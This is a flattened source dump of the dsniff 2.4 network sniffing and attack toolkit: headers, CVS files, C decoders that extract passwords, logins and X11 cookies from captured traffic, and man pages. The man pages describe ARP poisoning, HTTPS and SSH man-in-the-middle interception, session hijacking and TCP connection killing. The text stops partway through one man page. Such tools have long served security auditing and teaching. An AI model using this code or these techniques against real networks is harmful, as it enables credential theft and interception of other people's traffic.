├── missing ├── dummy.c ├── CVS │ ├── Repository │ ├── Root │ └── Entries ├── sys │ └── CVS │ │ ├── Repository │ │ ├── Root │ │ └── Entries ├── md5.h ├── libgen.h ├── err.h ├── memcmp.c ├── strlcpy.c ├── dirname.c ├── strlcat.c ├── strsep.c ├── err.c └── ethers.c ├── CVS ├── Repository ├── Root └── Entries ├── version.h ├── remote.c ├── base64.h ├── COPYRIGHT ├── arp.h ├── magic.h ├── asn1.h ├── hex.h ├── pcaputil.h ├── TODO ├── pathnames.h ├── options.h ├── record.h ├── acconfig.h ├── decode_ospf.c ├── tcp_raw.h ├── decode_rip.c ├── rpc.h ├── decode_telnet.c ├── decode_x11.c ├── webmitm.8 ├── webspy.8 ├── tcpkill.8 ├── tcpnice.8 ├── filesnarf.8 ├── sshmitm.8 ├── sshcrypto.h ├── msgsnarf.8 ├── trigger.h ├── decode_imap.c ├── arpspoof.8 ├── decode_napster.c ├── mailsnarf.8 ├── asn1.c ├── sshow.8 ├── decode_sniffer.c ├── urlsnarf.8 ├── macof.8 ├── dnsspoof.8 ├── decode_socks.c ├── decode_rlogin.c ├── decode_snmp.c ├── decode_smtp.c ├── dnsspoof.hosts ├── decode_postgresql.c ├── decode_ftp.c ├── dsniff.services ├── decode_nntp.c ├── decode_hex.c ├── LICENSE ├── decode_citrix.c ├── ssh.h ├── decode_oracle.c ├── decode_vrrp.c ├── hex.c ├── decode_portmap.c ├── decode_pop.c ├── decode_irc.c ├── decode_pcanywhere.c ├── decode_ldap.c ├── decode_mountd.c ├── decode_smb.c ├── buf.h ├── decode_mmxp.c ├── decode_cvs.c ├── dsniff.magic ├── pcaputil.c ├── decode_aim.c ├── arp.c ├── rpc.c ├── dsniff.8 ├── config.h.in ├── decode.h ├── decode_yp.c ├── tcpkill.c ├── macof.c ├── README ├── dsniff.c ├── record.c ├── decode_icq.c ├── decode_tds.c ├── sshcrypto.c ├── decode_http.c ├── arpspoof.c ├── buf.c ├── vroot.h ├── Makefile.in ├── decode_pptp.c ├── install-sh └── tcpnice.c /missing/dummy.c: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /CVS/Repository: -------------------------------------------------------------------------------- 1 | dsniff 2 | -------------------------------------------------------------------------------- /version.h: -------------------------------------------------------------------------------- 1 | #define VERSION "2.4" 2 | -------------------------------------------------------------------------------- /missing/CVS/Repository: -------------------------------------------------------------------------------- 1 | dsniff/missing 2 | -------------------------------------------------------------------------------- /CVS/Root: -------------------------------------------------------------------------------- 1 | dugsong@naughty.monkey.org:/cvs 2 | -------------------------------------------------------------------------------- /missing/CVS/Root: -------------------------------------------------------------------------------- 1 | dugsong@naughty.monkey.org:/cvs 2 | -------------------------------------------------------------------------------- /missing/sys/CVS/Repository: -------------------------------------------------------------------------------- 1 | dsniff/missing/sys 2 | -------------------------------------------------------------------------------- /missing/sys/CVS/Root: -------------------------------------------------------------------------------- 1 | dugsong@naughty.monkey.org:/cvs 2 | -------------------------------------------------------------------------------- /missing/sys/CVS/Entries: -------------------------------------------------------------------------------- 1 | /queue.h/1.1/Tue Nov 14 15:50:57 2000// 2 | D 3 | -------------------------------------------------------------------------------- /remote.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tecknicaltom/dsniff/HEAD/remote.c -------------------------------------------------------------------------------- /base64.h: -------------------------------------------------------------------------------- 1 | /* 2 | * base64.h 3 | * 4 | * Base-64 routines. 5 | * 6 | * $Id: base64.h,v 1.2 2001/03/15 08:33:05 dugsong Exp $ 7 | */ 8 | 9 | #ifndef BASE64_H 10 | #define BASE64_H 11 | 12 | int base64_pton(char const *, u_char *, size_t); 13 | 14 | #endif /* BASE64_H */ 15 | 16 | -------------------------------------------------------------------------------- /COPYRIGHT: -------------------------------------------------------------------------------- 1 | dsniff 2 | 3 | This file is intended to be a comprehensive list of contributors to 4 | this project. 5 | 6 | Copyright (C) 1999-2010 by the following: 7 | 8 | Dug Song 9 | Steve Kemp 10 | Joseph Battaglia 11 | Joshua Krage 12 | 13 | -------------------------------------------------------------------------------- /arp.h: -------------------------------------------------------------------------------- 1 | /* 2 | * arp.h 3 | * 4 | * ARP cache routines. 5 | * 6 | * Copyright (c) 1999 Dug Song 7 | * 8 | * $Id: arp.h,v 1.1 2001/03/15 08:27:08 dugsong Exp $ 9 | */ 10 | 11 | #ifndef _ARP_H_ 12 | #define _ARP_H_ 13 | 14 | int arp_cache_lookup(in_addr_t ip, struct ether_addr *ether, const char* linf); 15 | 16 | #endif /* _ARP_H_ */ 17 | -------------------------------------------------------------------------------- /magic.h: -------------------------------------------------------------------------------- 1 | /* 2 | * magic.h 3 | * 4 | * Network application protocol identification, based on file(1) magic. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: magic.h,v 1.3 2001/03/15 08:33:06 dugsong Exp $ 9 | */ 10 | 11 | #ifndef MAGIC_H 12 | #define MAGIC_H 13 | 14 | void magic_init(char *filename); 15 | 16 | char *magic_match(u_char *buf, int len); 17 | 18 | #endif /* MAGIC_H */ 19 | -------------------------------------------------------------------------------- /asn1.h: -------------------------------------------------------------------------------- 1 | /* 2 | * asn1.h 3 | * 4 | * ASN.1 routines. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: asn1.h,v 1.3 2001/03/15 08:33:05 dugsong Exp $ 9 | */ 10 | 11 | #ifndef ASN1_H 12 | #define ASN1_H 13 | 14 | #define ASN1_INTEGER 2 15 | #define ASN1_STRING 4 16 | #define ASN1_SEQUENCE 16 17 | 18 | int asn1_type(buf_t buf); 19 | int asn1_len(buf_t buf); 20 | 21 | #endif /* ASN1_H */ 22 | 23 | -------------------------------------------------------------------------------- /hex.h: -------------------------------------------------------------------------------- 1 | /* 2 | * hex.h 3 | * 4 | * Hexadecimal conversion routines. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: hex.h,v 1.3 2001/03/15 08:33:06 dugsong Exp $ 9 | */ 10 | 11 | #ifndef HEX_H 12 | #define HEX_H 13 | 14 | int hex_decode(char *src, int srclen, u_char *buf, int len); 15 | 16 | void hex_print(const u_char *buf, int len, int offset); 17 | 18 | #endif /* HEX_H */ 19 | 20 | -------------------------------------------------------------------------------- /pcaputil.h: -------------------------------------------------------------------------------- 1 | /* 2 | * pcaputil.h 3 | * 4 | * pcap utility routines. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: pcaputil.h,v 1.2 2001/03/15 08:33:06 dugsong Exp $ 9 | */ 10 | 11 | #ifndef PCAPUTIL_H 12 | #define PCAPUTIL_H 13 | 14 | pcap_t *pcap_init(char *intf, char *filter, int snaplen); 15 | 16 | int pcap_dloff(pcap_t *pd); 17 | 18 | char *copy_argv(char **argv); 19 | 20 | #endif /* PCAPUTIL_H */ 21 | -------------------------------------------------------------------------------- /TODO: -------------------------------------------------------------------------------- 1 | $Id: TODO,v 1.2 2000/12/02 06:29:30 dugsong Exp $ 2 | 3 | - finish conversion to buf interface 4 | 5 | - rework half-duplex tcp_raw reassembly, for *snarf [-c] 6 | 7 | - NTLM handling in telnet, FTP, HTTP, SMB, NNTP, etc. non-trivial 8 | since dsniff only examines client traffic :-/ 9 | 10 | - arpspoof [host ...] 11 | 12 | - more protocols: atalk, MAPI, etc.? 13 | 14 | - reverse more of AOL's OSCAR protocol for dsniff and msgsnarf 15 | 16 | -------------------------------------------------------------------------------- /pathnames.h: -------------------------------------------------------------------------------- 1 | /* 2 | * pathnames.h 3 | * 4 | * dsniff pathnames. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: pathnames.h,v 1.2 2001/03/15 08:33:06 dugsong Exp $ 9 | */ 10 | 11 | #ifndef PATHNAMES_H 12 | #define PATHNAMES_H 13 | 14 | #ifndef DSNIFF_LIBDIR 15 | #define DSNIFF_LIBDIR "/usr/local/lib/" 16 | #endif 17 | 18 | #define DSNIFF_SERVICES "dsniff.services" 19 | #define DSNIFF_MAGIC "dsniff.magic" 20 | 21 | #endif /* PATHNAMES_H */ 22 | -------------------------------------------------------------------------------- /options.h: -------------------------------------------------------------------------------- 1 | /* 2 | * options.h 3 | * 4 | * Global options. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: options.h,v 1.4 2001/03/15 08:33:06 dugsong Exp $ 9 | */ 10 | 11 | #ifndef OPTIONS_H 12 | #define OPTIONS_H 13 | 14 | extern int Opt_client; 15 | extern u_short Opt_dns; 16 | extern int Opt_debug; 17 | extern int Opt_magic; 18 | extern int Opt_read; 19 | extern int Opt_write; 20 | extern int Opt_snaplen; 21 | extern int Opt_lines; 22 | 23 | #endif /* OPTIONS_H */ 24 | 25 | -------------------------------------------------------------------------------- /record.h: -------------------------------------------------------------------------------- 1 | /* 2 | * record.h 3 | * 4 | * Record interface. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: record.h,v 1.3 2001/03/15 08:33:06 dugsong Exp $ 9 | */ 10 | 11 | #ifndef RECORD_H 12 | #define RECORD_H 13 | 14 | int record_init(char *file); 15 | 16 | int record(u_int32_t src, u_int32_t dst, int proto, u_short sport, 17 | u_short dport, char *name, u_char *buf, int len); 18 | 19 | void record_dump(void); 20 | 21 | void record_close(void); 22 | 23 | #endif /* RECORD_H */ 24 | 25 | -------------------------------------------------------------------------------- /missing/CVS/Entries: -------------------------------------------------------------------------------- 1 | D/sys//// 2 | /strsep.c/1.1/Tue Nov 28 18:26:52 2000// 3 | /dummy.c/1.1/Tue Nov 28 19:27:27 2000// 4 | /memcmp.c/1.1/Wed Nov 29 13:57:46 2000// 5 | /dirname.c/1.1/Tue Nov 14 15:50:56 2000// 6 | /err.c/1.2/Tue Nov 14 15:50:57 2000// 7 | /err.h/1.1/Tue Nov 14 15:50:57 2000// 8 | /ethers.c/1.1/Tue Nov 14 15:50:56 2000// 9 | /libgen.h/1.2/Tue Nov 14 15:50:57 2000// 10 | /md5.c/1.1/Tue Nov 14 15:50:56 2000// 11 | /md5.h/1.1/Tue Nov 14 15:50:56 2000// 12 | /strlcat.c/1.1/Tue Nov 14 15:50:55 2000// 13 | /strlcpy.c/1.1/Tue Nov 14 15:50:56 2000// 14 | -------------------------------------------------------------------------------- /missing/md5.h: -------------------------------------------------------------------------------- 1 | #ifndef MD5_H 2 | #define MD5_H 3 | 4 | struct MD5Context { 5 | u_int32_t buf[4]; 6 | u_int32_t bits[2]; 7 | unsigned char in[64]; 8 | }; 9 | 10 | void MD5Init(struct MD5Context *context); 11 | void MD5Update(struct MD5Context *context, unsigned char const *buf, 12 | unsigned len); 13 | void MD5Final(unsigned char digest[16], struct MD5Context *context); 14 | void MD5Transform(u_int32_t buf[4], u_int32_t const in[16]); 15 | 16 | /* 17 | * This is needed to make RSAREF happy on some MS-DOS compilers. 18 | */ 19 | typedef struct MD5Context MD5_CTX; 20 | 21 | #endif /* !MD5_H */ 22 | -------------------------------------------------------------------------------- /acconfig.h: -------------------------------------------------------------------------------- 1 | /* Define to 'uint32_t' if doesn't define. */ 2 | #undef u_int32_t 3 | 4 | /* Define to 'uint64_t' if doesn't define. */ 5 | #undef u_int64_t 6 | 7 | /* Define to 'u_int32_t' if doesn't define. */ 8 | #undef in_addr_t 9 | 10 | /* Define if you have the header file. */ 11 | #undef HAVE_DB_H 12 | 13 | /* Define if you have the header file. */ 14 | #undef HAVE_DB_185_H 15 | 16 | /* Should be in , *sigh* */ 17 | #undef HAVE_MINMAX 18 | #ifndef HAVE_MINMAX 19 | #define MIN(a,b) (((a)<(b))?(a):(b)) 20 | #define MAX(a,b) (((a)>(b))?(a):(b)) 21 | #endif 22 | 23 | -------------------------------------------------------------------------------- /decode_ospf.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_ospf.c 3 | * 4 | * Open Shortest Path First. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_ospf.c,v 1.6 2001/03/15 08:33:01 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "decode.h" 19 | 20 | int 21 | decode_ospf(u_char *buf, int len, u_char *obuf, int olen) 22 | { 23 | if (len < 25) 24 | return (0); 25 | 26 | if (pntohs(buf + 14) != 1) 27 | return (0); 28 | 29 | buf[24] = '\0'; 30 | 31 | return (snprintf(obuf, olen, "%s\n", buf + 16)); 32 | } 33 | 34 | -------------------------------------------------------------------------------- /tcp_raw.h: -------------------------------------------------------------------------------- 1 | /* 2 | * tcp_raw.h 3 | * 4 | * Raw (best-effort, half-duplex) TCP reassembly. Haaacccck. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: tcp_raw.h,v 1.5 2001/03/15 08:33:06 dugsong Exp $ 9 | */ 10 | 11 | #ifndef TCP_RAW_H 12 | #define TCP_RAW_H 13 | 14 | typedef void (*tcp_raw_callback_t)(in_addr_t src, in_addr_t dst, 15 | u_short sport, u_short dport, 16 | u_char *buf, int len); 17 | 18 | struct iovec *tcp_raw_input(struct libnet_ip_hdr *ip, 19 | struct libnet_tcp_hdr *tcp, int len); 20 | 21 | void tcp_raw_timeout(int timeout, tcp_raw_callback_t callback); 22 | 23 | #endif /* TCP_RAW_H */ 24 | -------------------------------------------------------------------------------- /decode_rip.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_rip.c 3 | * 4 | * Routing Information Protocol. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_rip.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "decode.h" 19 | 20 | int 21 | decode_rip(u_char *buf, int len, u_char *obuf, int olen) 22 | { 23 | if (len < 21) 24 | return (0); 25 | 26 | /* Version 2 simple password authentication. */ 27 | if (buf[1] != 2 || memcmp(buf + 4, "\xff\xff\x00\x02", 4) != 0) 28 | return (0); 29 | 30 | buf[20] = '\0'; 31 | 32 | return (snprintf(obuf, olen, "%s\n", buf + 20)); 33 | } 34 | 35 | -------------------------------------------------------------------------------- /rpc.h: -------------------------------------------------------------------------------- 1 | /* 2 | * rpc.h 3 | * 4 | * RPC utility routines. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: rpc.h,v 1.4 2001/03/15 08:33:06 dugsong Exp $ 9 | */ 10 | 11 | #ifndef RPC_H 12 | #define RPC_H 13 | 14 | #define FRAGLEN(x) (x & 0x7fffffff) 15 | #define LASTFRAG(x) (x & (1 << 31)) 16 | 17 | struct xid_map { 18 | u_int32_t xid; 19 | u_int32_t prog; 20 | u_int32_t vers; 21 | u_int32_t proc; 22 | void *data; 23 | }; 24 | 25 | int rpc_decode(u_char *buf, int len, struct rpc_msg *msg); 26 | 27 | void xid_map_enter(u_int32_t xid, u_int32_t prog, u_int32_t vers, 28 | u_int32_t proc, void *data); 29 | 30 | struct xid_map *xid_map_find(int xid); 31 | 32 | #endif /* RPC_H */ 33 | 34 | -------------------------------------------------------------------------------- /decode_telnet.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_telnet.c 3 | * 4 | * Telnet. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_telnet.c,v 1.5 2001/03/15 08:33:03 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "options.h" 19 | #include "decode.h" 20 | 21 | int 22 | decode_telnet(u_char *buf, int len, u_char *obuf, int olen) 23 | { 24 | if ((len = strip_telopts(buf, len)) == 0) 25 | return (0); 26 | 27 | if (!is_ascii_string(buf, len)) 28 | return (0); 29 | 30 | if (strip_lines(buf, Opt_lines) < 2) 31 | return (0); 32 | 33 | strlcpy(obuf, buf, olen); 34 | 35 | return (strlen(obuf)); 36 | } 37 | 38 | -------------------------------------------------------------------------------- /decode_x11.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_x11.c 3 | * 4 | * X11. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_x11.c,v 1.4 2001/03/15 08:33:03 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "decode.h" 19 | 20 | int 21 | decode_x11(u_char *buf, int len, u_char *obuf, int olen) 22 | { 23 | char *p, *q; 24 | int i; 25 | 26 | p = buf + 12; 27 | 28 | if (strncmp(p, "MIT-MAGIC-COOKIE-1", 18) != 0 || len < 36) 29 | return (0); 30 | 31 | strlcpy(obuf, "MIT-MAGIC-COOKIE-1 ", olen); 32 | 33 | p += 20; 34 | len -= 20; 35 | q = obuf + 19; 36 | 37 | for (i = 0; i < 16 && i < len; i++) 38 | sprintf(q + (i * 2), "%.2x", (u_char)p[i]); 39 | strlcat(obuf, "\n", olen); 40 | 41 | return (strlen(obuf)); 42 | } 43 | 44 | -------------------------------------------------------------------------------- /webmitm.8: -------------------------------------------------------------------------------- 1 | .TH WEBMITM 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | webmitm 6 | \- 7 | HTTP / HTTPS monkey-in-the-middle 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBwebmitm\fR [\fB-d\fR] [\fBhost\fR] 13 | .SH DESCRIPTION 14 | .ad 15 | .fi 16 | \fBwebmitm\fR transparently proxies and sniffs HTTP / HTTPS traffic 17 | redirected by dnsspoof(8), capturing most "secure" SSL-encrypted 18 | webmail logins and form submissions. 19 | .SH OPTIONS 20 | .IP \fB-d\fR 21 | Enable debugging mode. May be specified multiple times to greater 22 | effect. 23 | .IP \fBhost\fR 24 | Specify a host to proxy to. If none given, only requests containing an 25 | HTTP/1.1 Host: header or absolute URI will be relayed transparently. 26 | .SH FILES 27 | .IP \fIwebmitm.crt\fR 28 | SSL certificate 29 | .SH "SEE ALSO" 30 | dsniff(8), dnsspoof(8) 31 | .SH AUTHOR 32 | .na 33 | .nf 34 | Dug Song 35 | -------------------------------------------------------------------------------- /webspy.8: -------------------------------------------------------------------------------- 1 | .TH WEBSPY 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | webspy 6 | \- 7 | display sniffed URLs in Netscape in real-time 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBwebspy\fR [\fB-i \fIinterface\fR | \fB-p \fIpcapfile\fR] \fIhost\fR 13 | .SH DESCRIPTION 14 | .ad 15 | .fi 16 | \fBwebspy\fR sends URLs sniffed from a client to your local Netscape 17 | browser for display, updated in real-time (as the target surfs, your 18 | browser surfs along with them, automagically). Netscape must be 19 | running on your local X display ahead of time. 20 | .SH OPTIONS 21 | .IP "\fB-i \fIinterface\fR" 22 | Specify the interface to listen on. 23 | .IP "\fB-p \fIpcapfile\fR" 24 | Process packets from the specified PCAP capture file instead of the network. 25 | .IP \fIhost\fR 26 | Specify the web client to spy on. 27 | .SH "SEE ALSO" 28 | dsniff(8) 29 | .SH AUTHOR 30 | .na 31 | .nf 32 | Dug Song 33 | -------------------------------------------------------------------------------- /tcpkill.8: -------------------------------------------------------------------------------- 1 | .TH TCPKILL 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | tcpkill 6 | \- 7 | kill TCP connections on a LAN 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBtcpkill\fR [\fB-i \fIinterface\fR] [\fB-1\fR...\fB9\fR] \fIexpression\fR 13 | .SH DESCRIPTION 14 | .ad 15 | .fi 16 | \fBtcpkill\fR kills specified in-progress TCP connections (useful for 17 | libnids-based applications which require a full TCP 3-whs for TCB 18 | creation). 19 | .SH OPTIONS 20 | .IP "\fB-i \fIinterface\fR" 21 | Specify the interface to listen on. 22 | .IP \fB-1\fR...\fB9\fR 23 | Specify the degree of brute force to use in killing a connection. Fast 24 | connections may require a higher number in order to land a RST in the 25 | moving receive window. Default is 3. 26 | .IP \fIexpression\fR 27 | Specify a tcpdump(8) filter expression to select the connections to 28 | kill. 29 | .SH "SEE ALSO" 30 | dsniff(8), tcpnice(8) 31 | .SH AUTHOR 32 | .na 33 | .nf 34 | Dug Song 35 | -------------------------------------------------------------------------------- /tcpnice.8: -------------------------------------------------------------------------------- 1 | .TH TCPNICE 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | tcpnice 6 | \- 7 | slow down TCP connections on a LAN 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBtcpnice\fR [\fB-A\fR] [\fB-I\fR] [\fB-M\fR] [\fB-i \fIinterface\fR] 13 | \fIexpression\fR 14 | .SH DESCRIPTION 15 | .ad 16 | .fi 17 | \fBtcpnice\fR slows down specified TCP connections on a LAN via 18 | "active" traffic shaping. 19 | .SH OPTIONS 20 | .IP \fB-A\fR 21 | Inject TCP tiny window advertisements. 22 | .IP \fB-I\fR 23 | Inject ICMP source quench replies. 24 | .IP \fB-M\fR 25 | Inject ICMP fragmentation-needed replies with tiny next-hop MTUs. 26 | .IP "\fB-i \fIinterface\fR" 27 | Specify the interface to listen on. 28 | .IP \fIexpression\fR 29 | Specify a tcpdump(8) filter expression to select the connections to 30 | slow down. 31 | .LP 32 | If no attack type is given, all attacks will be enabled. 33 | .SH "SEE ALSO" 34 | dsniff(8), tcpkill(8) 35 | .SH AUTHOR 36 | .na 37 | .nf 38 | Dug Song 39 | -------------------------------------------------------------------------------- /filesnarf.8: -------------------------------------------------------------------------------- 1 | .TH FILESNARF 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | filesnarf 6 | \- 7 | sniff files from NFS traffic 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBfilesnarf\fR [\fB-i \fIinterface\fR | \fB-p \fIpcapfile\fR] [[\fB-v\fR] \fIpattern [\fIexpression\fR]] 13 | .SH DESCRIPTION 14 | .ad 15 | .fi 16 | \fBfilesnarf\fR saves files sniffed from NFS traffic in the current 17 | working directory. 18 | .SH OPTIONS 19 | .IP "\fB-i \fIinterface\fR" 20 | Specify the interface to listen on. 21 | .IP "\fB-p \fIpcapfile\fR" 22 | Process packets from the specified PCAP capture file instead of the network. 23 | .IP \fB-v\fR 24 | "Versus" mode. Invert the sense of matching, to select non-matching 25 | files. 26 | .IP \fIpattern\fR 27 | Specify regular expression for filename matching. 28 | .IP "\fIexpression\fR" 29 | Specify a tcpdump(8) filter expression to select traffic to sniff. 30 | .SH "SEE ALSO" 31 | dsniff(8), nfsd(8) 32 | .SH AUTHOR 33 | .na 34 | .nf 35 | Dug Song 36 | -------------------------------------------------------------------------------- /sshmitm.8: -------------------------------------------------------------------------------- 1 | .TH SSHMITM 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | sshmitm 6 | \- 7 | SSH monkey-in-the-middle 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBsshmitm\fR [\fB-d\fR] [\fB-I\fR] [\fB-p \fIport\fR] host [\fIport\fR] 13 | .SH DESCRIPTION 14 | .ad 15 | .fi 16 | \fBsshmitm\fR proxies and sniffs SSH traffic redirected by 17 | dnsspoof(8), capturing SSH password logins, and optionally hijacking 18 | interactive sessions. Only SSH protocol version 1 is (or ever will be) 19 | supported - this program is far too evil already. 20 | .SH OPTIONS 21 | .IP \fB-d\fR 22 | Enable verbose debugging output. 23 | .IP \fB-I\fR 24 | Monitor / hijack an interactive session. 25 | .IP "\fB-p \fIport\fR" 26 | Specify the local port to listen on. 27 | .IP \fIhost\fR 28 | Specify the remote host to relay connections to. 29 | .IP \fIport\fR 30 | Specify the remote port to relay connections to. 31 | .SH "SEE ALSO" 32 | dsniff(8), dnsspoof(8) 33 | .SH AUTHOR 34 | .na 35 | .nf 36 | Dug Song 37 | -------------------------------------------------------------------------------- /sshcrypto.h: -------------------------------------------------------------------------------- 1 | /* 2 | * sshcrypto.c 3 | * 4 | * SSH-1 crypto routines, adapted from OpenSSH. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * Copyright (c) 2000 Niels Provos 8 | * Copyright (c) 2000 Markus Friedl 9 | * 10 | * $Id: sshcrypto.h,v 1.3 2001/03/15 08:33:06 dugsong Exp $ 11 | */ 12 | 13 | #ifndef SSHCRYPTO_H 14 | #define SSHCRYPTO_H 15 | 16 | void rsa_public_encrypt(BIGNUM *src, BIGNUM *dst, RSA *key); 17 | void rsa_private_decrypt(BIGNUM *src, BIGNUM *dst, RSA *key); 18 | 19 | void *blowfish_init(u_char *sesskey, int len); 20 | void blowfish_encrypt(u_char *src, u_char *dst, int len, void *state); 21 | void blowfish_decrypt(u_char *src, u_char *dst, int len, void *state); 22 | 23 | void *des3_init(u_char *sesskey, int len); 24 | void des3_encrypt(u_char *src, u_char *dst, int len, void *state); 25 | void des3_decrypt(u_char *src, u_char *dst, int len, void *state); 26 | 27 | #endif /* SSHCRYPTO_H */ 28 | 29 | -------------------------------------------------------------------------------- /msgsnarf.8: -------------------------------------------------------------------------------- 1 | .TH MSGSNARF 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | msgsnarf 6 | \- 7 | sniff chat messages 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBmsgsnarf\fR [\fB-i \fIinterface\fR | \fB-p \fIpcapfile\fR] [[\fB-v\fR] \fIpattern [\fIexpression\fR]] 13 | .SH DESCRIPTION 14 | .ad 15 | .fi 16 | \fBmsgsnarf\fR records selected messages from AOL Instant 17 | Messenger, ICQ 2000, IRC, MSN Messenger, or Yahoo Messenger chat 18 | sessions. 19 | .SH OPTIONS 20 | .IP "\fB-i \fIinterface\fR" 21 | Specify the interface to listen on. 22 | .IP "\fB-p \fIpcapfile\fR" 23 | Process packets from the specified PCAP capture file instead of the network. 24 | .IP \fB-v\fR 25 | "Versus" mode. Invert the sense of matching, to select non-matching 26 | messages. 27 | .IP \fIpattern\fR 28 | Specify regular expression for message matching. 29 | .IP "\fIexpression\fR" 30 | Specify a tcpdump(8) filter expression to select traffic to sniff. 31 | .SH "SEE ALSO" 32 | dsniff(8) 33 | .SH AUTHOR 34 | .na 35 | .nf 36 | Dug Song 37 | -------------------------------------------------------------------------------- /trigger.h: -------------------------------------------------------------------------------- 1 | /* 2 | * trigger.h 3 | * 4 | * Trigger interface. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: trigger.h,v 1.5 2001/03/15 08:33:06 dugsong Exp $ 9 | */ 10 | 11 | #ifndef TRIGGER_H 12 | #define TRIGGER_H 13 | 14 | #define TRIGGER_TCP_RAW_TIMEOUT 30 15 | 16 | void trigger_init_list(char *list); 17 | void trigger_init_magic(char *filename); 18 | void trigger_init_services(char *filename); 19 | 20 | void trigger_dump(void); 21 | 22 | int trigger_set_ip(int proto, char *name); 23 | int trigger_set_udp(int port, char *name); 24 | int trigger_set_tcp(int port, char *name); 25 | int trigger_set_rpc(int program, char *name); 26 | 27 | void trigger_ip(struct libnet_ip_hdr *ip); 28 | void trigger_udp(struct libnet_ip_hdr *ip); 29 | void trigger_tcp(struct tcp_stream *ts, void **conn_save); 30 | void trigger_tcp_raw(struct libnet_ip_hdr *ip); 31 | void trigger_tcp_raw_timeout(int signal); 32 | void trigger_rpc(int program, int proto, int port); 33 | 34 | #endif /* TRIGGER_H */ 35 | 36 | -------------------------------------------------------------------------------- /decode_imap.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_imap.c 3 | * 4 | * Internet Mail Access Protocol. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_imap.c,v 1.5 2001/03/15 08:33:00 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "decode.h" 19 | #include "buf.h" 20 | 21 | int 22 | decode_imap(u_char *buf, int len, u_char *obuf, int olen) 23 | { 24 | struct buf *line, inbuf, outbuf; 25 | int i; 26 | 27 | buf_init(&inbuf, buf, len); 28 | buf_init(&outbuf, obuf, olen); 29 | 30 | while ((i = buf_index(&inbuf, "\r\n", 2)) != -1) { 31 | line = buf_tok(&inbuf, NULL, i); 32 | buf_skip(&inbuf, 2); 33 | 34 | if ((i = buf_index(line, " ", 1)) != -1) { 35 | buf_skip(line, i + 1); 36 | 37 | if (buf_cmp(line, "LOGIN ", 6) == 0) { 38 | buf_putf(&outbuf, "%.*s\n", 39 | buf_len(line), buf_ptr(line)); 40 | } 41 | } 42 | } 43 | buf_end(&outbuf); 44 | 45 | return (buf_len(&outbuf)); 46 | } 47 | -------------------------------------------------------------------------------- /arpspoof.8: -------------------------------------------------------------------------------- 1 | .TH ARPSPOOF 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | arpspoof 6 | \- 7 | intercept packets on a switched LAN 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBarpspoof\fR [\fB-i \fIinterface\fR] [\fB-t \fItarget\fR] \fIhost\fR 13 | .SH DESCRIPTION 14 | .ad 15 | .fi 16 | \fBarpspoof\fR redirects packets from a target host (or all hosts) 17 | on the LAN intended for another host on the LAN by forging ARP 18 | replies. This is an extremely effective way of sniffing traffic on a 19 | switch. 20 | .LP 21 | Kernel IP forwarding (or a userland program which accomplishes the 22 | same, e.g. fragrouter(8)) must be turned on ahead of time. 23 | .SH OPTIONS 24 | .IP "\fB-i \fIinterface\fR" 25 | Specify the interface to use. 26 | .IP "\fB-t \fItarget\fR" 27 | Specify a particular host to ARP poison (if not specified, all hosts 28 | on the LAN). 29 | .IP \fIhost\fR 30 | Specify the host you wish to intercept packets for (usually the local 31 | gateway). 32 | .SH "SEE ALSO" 33 | dsniff(8), fragrouter(8) 34 | .SH AUTHOR 35 | .na 36 | .nf 37 | 